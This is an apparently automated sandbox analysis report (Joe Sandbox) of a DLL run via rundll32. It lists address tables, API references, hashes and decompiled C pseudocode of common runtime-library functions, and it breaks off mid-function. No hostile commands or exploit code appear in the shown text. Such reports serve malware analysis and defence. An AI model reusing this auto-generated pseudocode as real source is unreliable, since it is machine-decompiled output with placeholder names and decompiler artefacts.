                          0x6e223fe9
                          0x6e224033
                          0x6e224036
                          0x6e22403c
                          0x6e22403e
                          0x6e224045
                          0x6e22404c
                          0x6e224051
                          0x6e224054
                          0x6e224056
                          0x6e224058
                          0x6e224065
                          0x6e22406b
                          0x6e22406d
                          0x6e224070
                          0x6e224070
                          0x6e224073
                          0x6e224073
                          0x6e224045
                          0x6e224079
                          0x6e22407b
                          0x6e224080
                          0x6e224083
                          0x6e224086
                          0x6e22408e
                          0x6e224092
                          0x6e224097
                          0x6e224097
                          0x6e22409a
                          0x6e22409b
                          0x6e22409e
                          0x6e2240a1
                          0x6e2240ac
                          0x6e2240ae
                          0x6e2240b1
                          0x6e2240b6
                          0x6e2240ba
                          0x6e2423d7
                          0x6e24f26f
                          0x6e24f272
                          0x6e24f273
                          0x6e24f276
                          0x6e24f279
                          0x6e24f2ab
                          0x6e24f2b0
                          0x6e24f2b6
                          0x6e24f2b6
                          0x6e24f27b
                          0x6e24f27b
                          0x6e24f27d
                          0x6e24f27f
                          0x6e24f27f
                          0x6e24f296
                          0x6e24f29f
                          0x6e24f2a5
                          0x6e24f2a7
                          0x00000000
                          0x00000000
                          0x6e24f287
                          0x6e24f289
                          0x00000000
                          0x6e24f28b
                          0x6e24f28c
                          0x6e24f291
                          0x6e24f292
                          0x6e24f294
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x6e24f294
                          0x00000000
                          0x6e24f289
                          0x6e24f2a9
                          0x6e24f2b8
                          0x6e24f2ba
                          0x6e223feb
                          0x00000000
                          0x6e223feb
                          0x6e223fe9
                          0x6e223fe7
                          0x00000000
                          0x6e223ff0
                          0x6e223ff0
                          0x6e223ff2
                          0x6e223ff9
                          0x00000000
                          0x6e223ffb
                          0x00000000
                          0x6e223ff9
                          0x6e223fb9
                          0x00000000

                          APIs
                          • _ValidateLocalCookies.LIBCMT ref: 6E223F8B
                          • ___except_validate_context_record.LIBVCRUNTIME ref: 6E223F93
                          • _ValidateLocalCookies.LIBCMT ref: 6E224021
                          • __IsNonwritableInCurrentImage.LIBCMT ref: 6E22404C
                          • _ValidateLocalCookies.LIBCMT ref: 6E2240A1
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.483288618.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true
                          • Associated: 00000003.00000002.483284816.000000006E1E0000.00000002.00020000.sdmp Download File
                          • Associated: 00000003.00000002.483332321.000000006E26A000.00000002.00020000.sdmp Download File
                          • Associated: 00000003.00000002.483367165.000000006E2C5000.00000004.00020000.sdmp Download File
                          • Associated: 00000003.00000002.483373942.000000006E2DC000.00000004.00020000.sdmp Download File
                          • Associated: 00000003.00000002.483378050.000000006E2DD000.00000002.00020000.sdmp Download File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_6e1e0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                          • String ID: csm
                          • API String ID: 1170836740-1018135373
                          • Opcode ID: 4036118a72cd09b98fd7ab41bcf03e77bdc2c174d201152525f5a170ef0b750f
                          • Instruction ID: d5a374a0051502dc650a2e16d71fb59f373354c9ded5dce8767f4bfa821dc166
                          • Opcode Fuzzy Hash: 4036118a72cd09b98fd7ab41bcf03e77bdc2c174d201152525f5a170ef0b750f
                          • Instruction Fuzzy Hash: 3641B434A0020E9FCF04DFE9D844A9E7BB6BF45329F108565E8149B395D7B1DA42CB91
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6E25D29B, Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                          Download Yara Rule
                          C-Code - Quality: 100%
                          			E6E25D29B(intOrPtr _a4) {
				void* _t18;
				intOrPtr _t45;

				_t45 = _a4;
				if(_t45 != 0) {
					E6E25CF81(_t45, 7);
					_t2 = _t45 + 0x1c; // 0x1c
					E6E25CF81(_t2, 7);
					_t3 = _t45 + 0x38; // 0x38
					E6E25CF81(_t3, 0xc);
					_t4 = _t45 + 0x68; // 0x68
					E6E25CF81(_t4, 0xc);
					_t5 = _t45 + 0x98; // 0x98
					E6E25CF81(_t5, 2);
					E6E24CBD3( *((intOrPtr*)(_t45 + 0xa0)));
					E6E24CBD3( *((intOrPtr*)(_t45 + 0xa4)));
					E6E24CBD3( *((intOrPtr*)(_t45 + 0xa8)));
					_t9 = _t45 + 0xb4; // 0xb4
					E6E25CF81(_t9, 7);
					_t10 = _t45 + 0xd0; // 0xd0
					E6E25CF81(_t10, 7);
					_t11 = _t45 + 0xec; // 0xec
					E6E25CF81(_t11, 0xc);
					_t12 = _t45 + 0x11c; // 0x11c
					E6E25CF81(_t12, 0xc);
					_t13 = _t45 + 0x14c; // 0x14c
					E6E25CF81(_t13, 2);
					E6E24CBD3( *((intOrPtr*)(_t45 + 0x154)));
					E6E24CBD3( *((intOrPtr*)(_t45 + 0x158)));
					E6E24CBD3( *((intOrPtr*)(_t45 + 0x15c)));
					return E6E24CBD3( *((intOrPtr*)(_t45 + 0x160)));
				}
				return _t18;
			}





                          0x6e25d2a1
                          0x6e25d2a6
                          0x6e25d2af
                          0x6e25d2b4
                          0x6e25d2ba
                          0x6e25d2bf
                          0x6e25d2c5
                          0x6e25d2ca
                          0x6e25d2d0
                          0x6e25d2d5
                          0x6e25d2de
                          0x6e25d2e9
                          0x6e25d2f4
                          0x6e25d2ff
                          0x6e25d304
                          0x6e25d30d
                          0x6e25d312
                          0x6e25d31b
                          0x6e25d323
                          0x6e25d32c
                          0x6e25d331
                          0x6e25d33a
                          0x6e25d33f
                          0x6e25d348
                          0x6e25d353
                          0x6e25d35e
                          0x6e25d369
                          0x00000000
                          0x6e25d379
                          0x6e25d37e

                          APIs
                            • Part of subcall function 6E25CF81: _free.LIBCMT ref: 6E25CFAA
                          • _free.LIBCMT ref: 6E25D2E9
                            • Part of subcall function 6E24CBD3: HeapFree.KERNEL32(00000000,00000000,?,6E25CFAF,00000000,00000000,00000000,00000000,?,6E25D2B4,00000000,00000007,00000000,?,6E25C0FC,00000000), ref: 6E24CBE9
                            • Part of subcall function 6E24CBD3: GetLastError.KERNEL32(00000000,?,6E25CFAF,00000000,00000000,00000000,00000000,?,6E25D2B4,00000000,00000007,00000000,?,6E25C0FC,00000000,00000000), ref: 6E24CBFB
                          • _free.LIBCMT ref: 6E25D2F4
                          • _free.LIBCMT ref: 6E25D2FF
                          • _free.LIBCMT ref: 6E25D353
                          • _free.LIBCMT ref: 6E25D35E
                          • _free.LIBCMT ref: 6E25D369
                          • _free.LIBCMT ref: 6E25D374
                          Memory Dump Source
                          • Source File: 00000003.00000002.483288618.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true
                          • Associated: 00000003.00000002.483284816.000000006E1E0000.00000002.00020000.sdmp Download File
                          • Associated: 00000003.00000002.483332321.000000006E26A000.00000002.00020000.sdmp Download File
                          • Associated: 00000003.00000002.483367165.000000006E2C5000.00000004.00020000.sdmp Download File
                          • Associated: 00000003.00000002.483373942.000000006E2DC000.00000004.00020000.sdmp Download File
                          • Associated: 00000003.00000002.483378050.000000006E2DD000.00000002.00020000.sdmp Download File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_6e1e0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: _free$ErrorFreeHeapLast
                          • String ID:
                          • API String ID: 776569668-0
                          • Opcode ID: 60696fea0fb7a8f1018e7d39f05bb92555332742b445cba9cf2dcfb68d68d62d
                          • Instruction ID: 8fa4785d91d2f5e5975e706f67165941b4479354c1bb5b7543d275e210967cf9
                          • Opcode Fuzzy Hash: 60696fea0fb7a8f1018e7d39f05bb92555332742b445cba9cf2dcfb68d68d62d
                          • Instruction Fuzzy Hash: 4D118175944B0CFBE520A7F0CD07FCBB7AE9F00B14F508D16E29AAE251EB39B5144650
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6E20EF91, Relevance: 10.6, APIs: 7, Instructions: 54COMMONLIBRARYCODE
                          Download Yara Rule
                          C-Code - Quality: 72%
                          			E6E20EF91(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t307;
				signed int _t308;
				void* _t320;
				void* _t333;
				void* _t346;
				void* _t359;
				void* _t372;
				void* _t385;
				void* _t398;
				void* _t411;
				void* _t424;
				void* _t437;
				void* _t450;
				void* _t463;
				void* _t476;
				void* _t489;
				void* _t502;
				void* _t515;
				void* _t528;
				void* _t541;
				void* _t554;
				void* _t567;
				signed int _t815;
				signed int _t882;
				signed int _t883;
				signed int _t884;
				signed int _t885;
				signed int _t886;
				signed int _t887;
				signed int _t888;
				signed int _t889;
				signed int _t890;
				signed int _t891;
				signed int _t892;
				signed int _t893;
				signed int _t894;
				signed int _t895;
				signed int _t896;
				signed int _t897;
				signed int _t898;
				signed int _t899;
				signed int _t900;
				signed int _t901;
				signed int _t903;
				signed int _t904;
				signed int _t905;
				signed int _t906;
				signed int _t907;
				signed int _t908;
				signed int _t909;
				signed int _t910;
				signed int _t911;
				signed int _t912;
				signed int _t913;
				signed int _t914;
				signed int _t915;
				signed int _t916;
				signed int _t917;
				signed int _t918;
				signed int _t919;
				signed int _t920;
				signed int _t921;
				signed int _t922;
				signed int _t923;
				signed int _t924;
				void* _t946;

				_t879 = __edx;
				_t668 = __ebx;
				E6E2200AC(0x6e2683cf, __ebx, __edi, __esi, 0x14);
				E6E206653(_t946 - 0x14, 0);
				_t903 =  *0x6e2c6de4; // 0x0
				 *(_t946 - 4) =  *(_t946 - 4) & 0x00000000;
				 *(_t946 - 0x10) = _t903;
				_t307 = E6E1E161C(0x6e2c6d90);
				_t671 =  *((intOrPtr*)(_t946 + 8));
				_t308 = E6E1E171B( *((intOrPtr*)(_t946 + 8)), _t307);
				_t881 = _t308;
				if(_t308 != 0) {
					L5:
					E6E2066BA(_t946 - 0x14);
					return E6E220075(_t881);
				} else {
					if(_t903 == 0) {
						_push( *((intOrPtr*)(_t946 + 8)));
						_push(_t946 - 0x10);
						__eflags = E6E210D03(__ebx, _t671, __edx, _t881, _t903) - 0xffffffff;
						if(__eflags == 0) {
							E6E1E1438(_t946 - 0x20);
							E6E223D74(_t946 - 0x20, 0x6e2c3504);
							asm("int3");
							E6E2200AC(0x6e2683cf, __ebx, _t881, _t903, 0x14);
							E6E206653(_t946 - 0x14, 0);
							_t904 =  *0x6e2c6db4; // 0x0
							 *(_t946 - 4) =  *(_t946 - 4) & 0x00000000;
							 *(_t946 - 0x10) = _t904;
							_t320 = E6E1E161C(0x6e2c6d68);
							_t678 =  *((intOrPtr*)(_t946 + 8));
							_t882 = E6E1E171B( *((intOrPtr*)(_t946 + 8)), _t320);
							__eflags = _t882;
							if(_t882 != 0) {
								L12:
								E6E2066BA(_t946 - 0x14);
								return E6E220075(_t882);
							} else {
								__eflags = _t904;
								if(_t904 == 0) {
									_push( *((intOrPtr*)(_t946 + 8)));
									_push(_t946 - 0x10);
									__eflags = E6E210DA5(_t668, _t678, __edx, _t882, _t904) - 0xffffffff;
									if(__eflags == 0) {
										E6E1E1438(_t946 - 0x20);
										E6E223D74(_t946 - 0x20, 0x6e2c3504);
										asm("int3");
										E6E2200AC(0x6e2683cf, _t668, _t882, _t904, 0x14);
										E6E206653(_t946 - 0x14, 0);
										_t905 =  *0x6e2c6dd4; // 0x0
										 *(_t946 - 4) =  *(_t946 - 4) & 0x00000000;
										 *(_t946 - 0x10) = _t905;
										_t333 = E6E1E161C(0x6e2c6b28);
										_t685 =  *((intOrPtr*)(_t946 + 8));
										_t883 = E6E1E171B( *((intOrPtr*)(_t946 + 8)), _t333);
										__eflags = _t883;
										if(_t883 != 0) {
											L19:
											E6E2066BA(_t946 - 0x14);
											return E6E220075(_t883);
										} else {
											__eflags = _t905;
											if(_t905 == 0) {
												_push( *((intOrPtr*)(_t946 + 8)));
												_push(_t946 - 0x10);
												__eflags = E6E210E47(_t668, _t685, __edx, _t883, _t905) - 0xffffffff;
												if(__eflags == 0) {
													E6E1E1438(_t946 - 0x20);
													E6E223D74(_t946 - 0x20, 0x6e2c3504);
													asm("int3");
													E6E2200AC(0x6e2683cf, _t668, _t883, _t905, 0x14);
													E6E206653(_t946 - 0x14, 0);
													_t906 =  *0x6e2c6de8; // 0x0
													 *(_t946 - 4) =  *(_t946 - 4) & 0x00000000;
													 *(_t946 - 0x10) = _t906;
													_t346 = E6E1E161C(0x6e2c6d94);
													_t692 =  *((intOrPtr*)(_t946 + 8));
													_t884 = E6E1E171B( *((intOrPtr*)(_t946 + 8)), _t346);
													__eflags = _t884;
													if(_t884 != 0) {
														L26:
														E6E2066BA(_t946 - 0x14);
														return E6E220075(_t884);
													} else {
														__eflags = _t906;
														if(_t906 == 0) {
															_push( *((intOrPtr*)(_t946 + 8)));
															_push(_t946 - 0x10);
															__eflags = E6E210EB7(_t668, _t692, _t879, _t884, _t906) - 0xffffffff;
															if(__eflags == 0) {
																E6E1E1438(_t946 - 0x20);
																E6E223D74(_t946 - 0x20, 0x6e2c3504);
																asm("int3");
																E6E2200AC(0x6e2683cf, _t668, _t884, _t906, 0x14);
																E6E206653(_t946 - 0x14, 0);
																_t907 =  *0x6e2c6db8; // 0x0
																 *(_t946 - 4) =  *(_t946 - 4) & 0x00000000;
																 *(_t946 - 0x10) = _t907;
																_t359 = E6E1E161C(0x6e2c6d6c);
																_t699 =  *((intOrPtr*)(_t946 + 8));
																_t885 = E6E1E171B( *((intOrPtr*)(_t946 + 8)), _t359);
																__eflags = _t885;
																if(_t885 != 0) {
																	L33:
																	E6E2066BA(_t946 - 0x14);
																	return E6E220075(_t885);
																} else {
																	__eflags = _t907;
																	if(_t907 == 0) {
																		_push( *((intOrPtr*)(_t946 + 8)));
																		_push(_t946 - 0x10);
																		__eflags = E6E210F1F(_t668, _t699, _t879, _t885, _t907) - 0xffffffff;
																		if(__eflags == 0) {
																			E6E1E1438(_t946 - 0x20);
																			E6E223D74(_t946 - 0x20, 0x6e2c3504);
																			asm("int3");
																			E6E2200AC(0x6e2683cf, _t668, _t885, _t907, 0x14);
																			E6E206653(_t946 - 0x14, 0);
																			_t908 =  *0x6e2c6dec; // 0x0
																			 *(_t946 - 4) =  *(_t946 - 4) & 0x00000000;
																			 *(_t946 - 0x10) = _t908;
																			_t372 = E6E1E161C(0x6e2c6d98);
																			_t706 =  *((intOrPtr*)(_t946 + 8));
																			_t886 = E6E1E171B( *((intOrPtr*)(_t946 + 8)), _t372);
																			__eflags = _t886;
																			if(_t886 != 0) {
																				L40:
																				E6E2066BA(_t946 - 0x14);
																				return E6E220075(_t886);
																			} else {
																				__eflags = _t908;
																				if(_t908 == 0) {
																					_push( *((intOrPtr*)(_t946 + 8)));
																					_push(_t946 - 0x10);
																					__eflags = E6E210F87(_t668, _t706, _t879, _t886, _t908) - 0xffffffff;
																					if(__eflags == 0) {
																						E6E1E1438(_t946 - 0x20);
																						E6E223D74(_t946 - 0x20, 0x6e2c3504);
																						asm("int3");
																						E6E2200AC(0x6e2683cf, _t668, _t886, _t908, 0x14);
																						E6E206653(_t946 - 0x14, 0);
																						_t909 =  *0x6e2c6dbc; // 0x0
																						 *(_t946 - 4) =  *(_t946 - 4) & 0x00000000;
																						 *(_t946 - 0x10) = _t909;
																						_t385 = E6E1E161C(0x6e2c6d70);
																						_t713 =  *((intOrPtr*)(_t946 + 8));
																						_t887 = E6E1E171B( *((intOrPtr*)(_t946 + 8)), _t385);
																						__eflags = _t887;
																						if(_t887 != 0) {
																							L47:
																							E6E2066BA(_t946 - 0x14);
																							return E6E220075(_t887);
																						} else {
																							__eflags = _t909;
																							if(_t909 == 0) {
																								_push( *((intOrPtr*)(_t946 + 8)));
																								_push(_t946 - 0x10);
																								__eflags = E6E210FEF(_t668, _t713, _t879, _t887, _t909) - 0xffffffff;
																								if(__eflags == 0) {
																									E6E1E1438(_t946 - 0x20);
																									E6E223D74(_t946 - 0x20, 0x6e2c3504);
																									asm("int3");
																									E6E2200AC(0x6e2683cf, _t668, _t887, _t909, 0x14);
																									E6E206653(_t946 - 0x14, 0);
																									_t910 =  *0x6e2c6df0; // 0x0
																									 *(_t946 - 4) =  *(_t946 - 4) & 0x00000000;
																									 *(_t946 - 0x10) = _t910;
																									_t398 = E6E1E161C(0x6e2c6d9c);
																									_t720 =  *((intOrPtr*)(_t946 + 8));
																									_t888 = E6E1E171B( *((intOrPtr*)(_t946 + 8)), _t398);
																									__eflags = _t888;
																									if(_t888 != 0) {
																										L54:
																										E6E2066BA(_t946 - 0x14);
																										return E6E220075(_t888);
																									} else {
																										__eflags = _t910;
																										if(_t910 == 0) {
																											_push( *((intOrPtr*)(_t946 + 8)));
																											_push(_t946 - 0x10);
																											__eflags = E6E211057(_t668, _t720, _t879, _t888, _t910) - 0xffffffff;
																											if(__eflags == 0) {
																												E6E1E1438(_t946 - 0x20);
																												E6E223D74(_t946 - 0x20, 0x6e2c3504);
																												asm("int3");
																												E6E2200AC(0x6e2683cf, _t668, _t888, _t910, 0x14);
																												E6E206653(_t946 - 0x14, 0);
																												_t911 =  *0x6e2c6dc0; // 0x0
																												 *(_t946 - 4) =  *(_t946 - 4) & 0x00000000;
																												 *(_t946 - 0x10) = _t911;
																												_t411 = E6E1E161C(0x6e2c6d74);
																												_t727 =  *((intOrPtr*)(_t946 + 8));
																												_t889 = E6E1E171B( *((intOrPtr*)(_t946 + 8)), _t411);
																												__eflags = _t889;
																												if(_t889 != 0) {
																													L61:
																													E6E2066BA(_t946 - 0x14);
																													return E6E220075(_t889);
																												} else {
																													__eflags = _t911;
																													if(_t911 == 0) {
																														_push( *((intOrPtr*)(_t946 + 8)));
																														_push(_t946 - 0x10);
																														__eflags = E6E2110BF(_t668, _t727, _t879, _t889, _t911) - 0xffffffff;
																														if(__eflags == 0) {
																															E6E1E1438(_t946 - 0x20);
																															E6E223D74(_t946 - 0x20, 0x6e2c3504);
																															asm("int3");
																															E6E2200AC(0x6e2683cf, _t668, _t889, _t911, 0x14);
																															E6E206653(_t946 - 0x14, 0);
																															_t912 =  *0x6e2c6df8; // 0x0
																															 *(_t946 - 4) =  *(_t946 - 4) & 0x00000000;
																															 *(_t946 - 0x10) = _t912;
																															_t424 = E6E1E161C(0x6e2c6da4);
																															_t734 =  *((intOrPtr*)(_t946 + 8));
																															_t890 = E6E1E171B( *((intOrPtr*)(_t946 + 8)), _t424);
																															__eflags = _t890;
																															if(_t890 != 0) {
																																L68:
																																E6E2066BA(_t946 - 0x14);
																																return E6E220075(_t890);
																															} else {
																																__eflags = _t912;
																																if(_t912 == 0) {
																																	_push( *((intOrPtr*)(_t946 + 8)));
																																	_push(_t946 - 0x10);
																																	__eflags = E6E211127(_t668, _t734, _t879, _t890, _t912) - 0xffffffff;
																																	if(__eflags == 0) {
																																		E6E1E1438(_t946 - 0x20);
																																		E6E223D74(_t946 - 0x20, 0x6e2c3504);
																																		asm("int3");
																																		E6E2200AC(0x6e2683cf, _t668, _t890, _t912, 0x14);
																																		E6E206653(_t946 - 0x14, 0);
																																		_t913 =  *0x6e2c6df4; // 0x0
																																		 *(_t946 - 4) =  *(_t946 - 4) & 0x00000000;
																																		 *(_t946 - 0x10) = _t913;
																																		_t437 = E6E1E161C(0x6e2c6da0);
																																		_t741 =  *((intOrPtr*)(_t946 + 8));
																																		_t891 = E6E1E171B( *((intOrPtr*)(_t946 + 8)), _t437);
																																		__eflags = _t891;
																																		if(_t891 != 0) {
																																			L75:
																																			E6E2066BA(_t946 - 0x14);
																																			return E6E220075(_t891);
																																		} else {
																																			__eflags = _t913;
																																			if(_t913 == 0) {
																																				_push( *((intOrPtr*)(_t946 + 8)));
																																				_push(_t946 - 0x10);
																																				__eflags = E6E2111AB(_t668, _t741, _t879, _t891, _t913) - 0xffffffff;
																																				if(__eflags == 0) {
																																					E6E1E1438(_t946 - 0x20);
																																					E6E223D74(_t946 - 0x20, 0x6e2c3504);
																																					asm("int3");
																																					E6E2200AC(0x6e2683cf, _t668, _t891, _t913, 0x14);
																																					E6E206653(_t946 - 0x14, 0);
																																					_t914 =  *0x6e2c6dc8; // 0x0
																																					 *(_t946 - 4) =  *(_t946 - 4) & 0x00000000;
																																					 *(_t946 - 0x10) = _t914;
																																					_t450 = E6E1E161C(0x6e2c6d7c);
																																					_t748 =  *((intOrPtr*)(_t946 + 8));
																																					_t892 = E6E1E171B( *((intOrPtr*)(_t946 + 8)), _t450);
																																					__eflags = _t892;
																																					if(_t892 != 0) {
																																						L82:
																																						E6E2066BA(_t946 - 0x14);
																																						return E6E220075(_t892);
																																					} else {
																																						__eflags = _t914;
																																						if(_t914 == 0) {
																																							_push( *((intOrPtr*)(_t946 + 8)));
																																							_push(_t946 - 0x10);
																																							__eflags = E6E211230(_t668, _t748, _t879, _t892, _t914) - 0xffffffff;
																																							if(__eflags == 0) {
																																								E6E1E1438(_t946 - 0x20);
																																								E6E223D74(_t946 - 0x20, 0x6e2c3504);
																																								asm("int3");
																																								E6E2200AC(0x6e2683cf, _t668, _t892, _t914, 0x14);
																																								E6E206653(_t946 - 0x14, 0);
																																								_t915 =  *0x6e2c6dc4; // 0x0
																																								 *(_t946 - 4) =  *(_t946 - 4) & 0x00000000;
																																								 *(_t946 - 0x10) = _t915;
																																								_t463 = E6E1E161C(0x6e2c6d78);
																																								_t755 =  *((intOrPtr*)(_t946 + 8));
																																								_t893 = E6E1E171B( *((intOrPtr*)(_t946 + 8)), _t463);
																																								__eflags = _t893;
																																								if(_t893 != 0) {
																																									L89:
																																									E6E2066BA(_t946 - 0x14);
																																									return E6E220075(_t893);
																																								} else {
																																									__eflags = _t915;
																																									if(_t915 == 0) {
																																										_push( *((intOrPtr*)(_t946 + 8)));
																																										_push(_t946 - 0x10);
																																										__eflags = E6E2112B4(_t668, _t755, _t879, _t893, _t915) - 0xffffffff;
																																										if(__eflags == 0) {
																																											E6E1E1438(_t946 - 0x20);
																																											E6E223D74(_t946 - 0x20, 0x6e2c3504);
																																											asm("int3");
																																											E6E2200AC(0x6e2683cf, _t668, _t893, _t915, 0x14);
																																											E6E206653(_t946 - 0x14, 0);
																																											_t916 =  *0x6e2c6dd8; // 0x0
																																											 *(_t946 - 4) =  *(_t946 - 4) & 0x00000000;
																																											 *(_t946 - 0x10) = _t916;
																																											_t476 = E6E1E161C(0x6e2c6d84);
																																											_t762 =  *((intOrPtr*)(_t946 + 8));
																																											_t894 = E6E1E171B( *((intOrPtr*)(_t946 + 8)), _t476);
																																											__eflags = _t894;
																																											if(_t894 != 0) {
																																												L96:
																																												E6E2066BA(_t946 - 0x14);
																																												return E6E220075(_t894);
																																											} else {
																																												__eflags = _t916;
																																												if(_t916 == 0) {
																																													_push( *((intOrPtr*)(_t946 + 8)));
																																													_push(_t946 - 0x10);
																																													__eflags = E6E211339(_t668, _t762, _t879, _t894, _t916) - 0xffffffff;
																																													if(__eflags == 0) {
																																														E6E1E1438(_t946 - 0x20);
																																														E6E223D74(_t946 - 0x20, 0x6e2c3504);
																																														asm("int3");
																																														E6E2200AC(0x6e2683cf, _t668, _t894, _t916, 0x14);
																																														E6E206653(_t946 - 0x14, 0);
																																														_t917 =  *0x6e2c6db0; // 0x0
																																														 *(_t946 - 4) =  *(_t946 - 4) & 0x00000000;
																																														 *(_t946 - 0x10) = _t917;
																																														_t489 = E6E1E161C(0x6e2c6d64);
																																														_t769 =  *((intOrPtr*)(_t946 + 8));
																																														_t895 = E6E1E171B( *((intOrPtr*)(_t946 + 8)), _t489);
																																														__eflags = _t895;
																																														if(_t895 != 0) {
																																															L103:
																																															E6E2066BA(_t946 - 0x14);
																																															return E6E220075(_t895);
																																														} else {
																																															__eflags = _t917;
																																															if(_t917 == 0) {
																																																_push( *((intOrPtr*)(_t946 + 8)));
																																																_push(_t946 - 0x10);
																																																__eflags = E6E2113A1(_t668, _t769, _t879, _t895, _t917) - 0xffffffff;
																																																if(__eflags == 0) {
																																																	E6E1E1438(_t946 - 0x20);
																																																	E6E223D74(_t946 - 0x20, 0x6e2c3504);
																																																	asm("int3");
																																																	E6E2200AC(0x6e2683cf, _t668, _t895, _t917, 0x14);
																																																	E6E206653(_t946 - 0x14, 0);
																																																	_t918 =  *0x6e2c6ddc; // 0x0
																																																	 *(_t946 - 4) =  *(_t946 - 4) & 0x00000000;
																																																	 *(_t946 - 0x10) = _t918;
																																																	_t502 = E6E1E161C(0x6e2c6d88);
																																																	_t776 =  *((intOrPtr*)(_t946 + 8));
																																																	_t896 = E6E1E171B( *((intOrPtr*)(_t946 + 8)), _t502);
																																																	__eflags = _t896;
																																																	if(_t896 != 0) {
																																																		L110:
																																																		E6E2066BA(_t946 - 0x14);
																																																		return E6E220075(_t896);
																																																	} else {
																																																		__eflags = _t918;
																																																		if(_t918 == 0) {
																																																			_push( *((intOrPtr*)(_t946 + 8)));
																																																			_push(_t946 - 0x10);
																																																			__eflags = E6E211409(_t668, _t776, _t879, _t896, _t918) - 0xffffffff;
																																																			if(__eflags == 0) {
																																																				E6E1E1438(_t946 - 0x20);
																																																				E6E223D74(_t946 - 0x20, 0x6e2c3504);
																																																				asm("int3");
																																																				E6E2200AC(0x6e2683cf, _t668, _t896, _t918, 0x14);
																																																				E6E206653(_t946 - 0x14, 0);
																																																				_t919 =  *0x6e2c6de0; // 0x0
																																																				 *(_t946 - 4) =  *(_t946 - 4) & 0x00000000;
																																																				 *(_t946 - 0x10) = _t919;
																																																				_t515 = E6E1E161C(0x6e2c6d8c);
																																																				_t783 =  *((intOrPtr*)(_t946 + 8));
																																																				_t897 = E6E1E171B( *((intOrPtr*)(_t946 + 8)), _t515);
																																																				__eflags = _t897;
																																																				if(_t897 != 0) {
																																																					L117:
																																																					E6E2066BA(_t946 - 0x14);
																																																					return E6E220075(_t897);
																																																				} else {
																																																					__eflags = _t919;
																																																					if(_t919 == 0) {
																																																						_push( *((intOrPtr*)(_t946 + 8)));
																																																						_push(_t946 - 0x10);
																																																						__eflags = E6E211471(_t668, _t783, _t879, _t897, _t919) - 0xffffffff;
																																																						if(__eflags == 0) {
																																																							E6E1E1438(_t946 - 0x20);
																																																							E6E223D74(_t946 - 0x20, 0x6e2c3504);
																																																							asm("int3");
																																																							E6E2200AC(0x6e2683cf, _t668, _t897, _t919, 0x14);
																																																							E6E206653(_t946 - 0x14, 0);
																																																							_t920 =  *0x6e2c6dfc; // 0x0
																																																							 *(_t946 - 4) =  *(_t946 - 4) & 0x00000000;
																																																							 *(_t946 - 0x10) = _t920;
																																																							_t528 = E6E1E161C(0x6e2c6da8);
																																																							_t790 =  *((intOrPtr*)(_t946 + 8));
																																																							_t898 = E6E1E171B( *((intOrPtr*)(_t946 + 8)), _t528);
																																																							__eflags = _t898;
																																																							if(_t898 != 0) {
																																																								L124:
																																																								E6E2066BA(_t946 - 0x14);
																																																								return E6E220075(_t898);
																																																							} else {
																																																								__eflags = _t920;
																																																								if(_t920 == 0) {
																																																									_push( *((intOrPtr*)(_t946 + 8)));
																																																									_push(_t946 - 0x10);
																																																									__eflags = E6E2114EC(_t668, _t790, _t879, _t898, _t920) - 0xffffffff;
																																																									if(__eflags == 0) {
																																																										E6E1E1438(_t946 - 0x20);
																																																										E6E223D74(_t946 - 0x20, 0x6e2c3504);
																																																										asm("int3");
																																																										E6E2200AC(0x6e2683cf, _t668, _t898, _t920, 0x14);
																																																										E6E206653(_t946 - 0x14, 0);
																																																										_t921 =  *0x6e2c6dcc; // 0x0
																																																										 *(_t946 - 4) =  *(_t946 - 4) & 0x00000000;
																																																										 *(_t946 - 0x10) = _t921;
																																																										_t541 = E6E1E161C(0x6e2c6d80);
																																																										_t797 =  *((intOrPtr*)(_t946 + 8));
																																																										_t899 = E6E1E171B( *((intOrPtr*)(_t946 + 8)), _t541);
																																																										__eflags = _t899;
																																																										if(_t899 != 0) {
																																																											L131:
																																																											E6E2066BA(_t946 - 0x14);
																																																											return E6E220075(_t899);
																																																										} else {
																																																											__eflags = _t921;
																																																											if(_t921 == 0) {
																																																												_push( *((intOrPtr*)(_t946 + 8)));
																																																												_push(_t946 - 0x10);
																																																												__eflags = E6E211558(_t668, _t797, _t879, _t899, _t921) - 0xffffffff;
																																																												if(__eflags == 0) {
																																																													E6E1E1438(_t946 - 0x20);
																																																													E6E223D74(_t946 - 0x20, 0x6e2c3504);
																																																													asm("int3");
																																																													E6E2200AC(0x6e2683cf, _t668, _t899, _t921, 0x14);
																																																													E6E206653(_t946 - 0x14, 0);
																																																													_t922 =  *0x6e2c6e00; // 0x0
																																																													 *(_t946 - 4) =  *(_t946 - 4) & 0x00000000;
																																																													 *(_t946 - 0x10) = _t922;
																																																													_t554 = E6E1E161C(0x6e2c6dac);
																																																													_t804 =  *((intOrPtr*)(_t946 + 8));
																																																													_t900 = E6E1E171B( *((intOrPtr*)(_t946 + 8)), _t554);
																																																													__eflags = _t900;
																																																													if(_t900 != 0) {
																																																														L138:
																																																														E6E2066BA(_t946 - 0x14);
																																																														return E6E220075(_t900);
																																																													} else {
																																																														__eflags = _t922;
																																																														if(_t922 == 0) {
																																																															_push( *((intOrPtr*)(_t946 + 8)));
																																																															_push(_t946 - 0x10);
																																																															__eflags = E6E2115C4(_t668, _t804, _t879, _t900, _t922) - 0xffffffff;
																																																															if(__eflags == 0) {
																																																																E6E1E1438(_t946 - 0x20);
																																																																E6E223D74(_t946 - 0x20, 0x6e2c3504);
																																																																asm("int3");
																																																																E6E2200AC(0x6e2683cf, _t668, _t900, _t922, 0x14);
																																																																E6E206653(_t946 - 0x14, 0);
																																																																_t923 =  *0x6e2c6dd0; // 0x0
																																																																 *(_t946 - 4) =  *(_t946 - 4) & 0x00000000;
																																																																 *(_t946 - 0x10) = _t923;
																																																																_t567 = E6E1E161C(0x6e2c6d60);
